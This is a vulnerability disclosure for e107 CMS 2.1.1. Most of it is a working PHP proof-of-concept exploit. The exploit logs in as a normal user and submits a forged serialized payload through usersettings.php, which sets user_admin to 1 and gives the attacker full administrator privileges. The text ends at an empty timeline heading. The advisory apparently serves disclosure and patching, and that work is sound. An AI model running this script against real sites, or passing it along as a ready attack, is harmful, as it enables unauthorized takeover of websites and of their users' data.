e107 CMS 2.1.1 Privilege Escalation

Homepage:

http://e107.org/

Description:

Datas from $_POST['updated_data'] inside usersettings.php are not properly validated so we can set user_admin value in database using this input.

Proof of Concept:

Create and activate normal user using registration form, then get admin privilege using this exploit:

<?php

/**
 * e107 CMS 2.1.1 Privilege Escalation
 * Kacper Szurek
 * http://security.szurek.pl
 */
function hack($url, $login, $pass, $cookie){

	$ckfile = dirname(__FILE__) . $cookie;
	$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('username' => $login, 'userpass' => $pass, 'userlogin' => 'Sign In')));
	curl_setopt($ch, CURLOPT_POST, 1);
	$content = curl_exec($ch);
	if (strpos($content, '?logout') === false) {
		die("Cannot login");
	}

	$data = array();
	$data['user_admin'] = 1;
	$data['user_perms'] = 0;
	$data['user_password'] = md5($pass);

	curl_setopt($ch, CURLOPT_URL, $url.'/usersettings.php');
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('SaveValidatedInfo' => 1, 'updated_data' => base64_encode(serialize($data)), 'updated_key' => md5(serialize($data)), 'currentpassword' => $pass)));
	$content = curl_exec($ch);

	if (strpos($content, 'Settings updated') === false) {
		die("Exploit probably failed");
	}

	die('OK!');
}

$url = "http://url_here";

// Standard user credentials 
$user = "login_here";
$pass = "password_here";

$cookie = "/cookie.txt";
hack($url, $user, $pass, $cookie);

Timeline: